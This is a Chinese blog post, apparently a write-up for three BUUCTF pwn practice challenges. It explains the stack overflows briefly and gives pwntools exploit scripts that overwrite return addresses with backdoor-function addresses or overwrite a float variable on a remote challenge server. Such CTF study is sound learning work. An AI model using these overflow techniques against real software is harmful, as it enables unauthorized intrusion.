当前位置:首页 » 《休闲阅读》 » 正文

buu_pwn_王富贵同学的博客

24 人参与  2022年02月16日 08:36  分类 : 《休闲阅读》  评论

点击全文阅读


warmup_csaw_2016

在这里插入图片描述明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d
在这里插入图片描述在这里插入图片描述

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sl=lambda x:io.sendline(x)

io=remote('node4.buuoj.cn',25851)

payload=bytes('a',encoding='utf8')*(0x40+8)+p64(0x40060d)
sl(payload)

io.interactive()

ciscn_2019_n_1

ciscn_2019_n_1func()
在这里插入图片描述没有必要进行溢出,只要覆盖到v2,让v2==11.28125就可以
在这里插入图片描述注意数值转换
请参考:浮点数在内存中如何表示

from pwn import *

p = remote('node4.buuoj.cn', 27536)
payload = bytes('a',encoding='utf8')*(0x30-0x04) + p32(0x41348000)

p.sendline(payload)
p.interactive()

pwn1_sctf_2016

在这里插入图片描述vuln()
在这里插入图片描述在这里插入图片描述后门函数
在这里插入图片描述

from pwn import *
p=remote('node4.buuoj.cn',26933)

payload=20*bytes('I',encoding='utf8')+4*bytes('A',encoding='utf8')+p32(0x8048F0D)

p.sendline(payload)
p.interactive()

参考文章
CTF(Pwn)32位文件 和 64 文件 的 差异
pwn1_sctf_2016


点击全文阅读


本文链接:http://zhangshiyu.com/post/34829.html

溢出  后门  函数  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1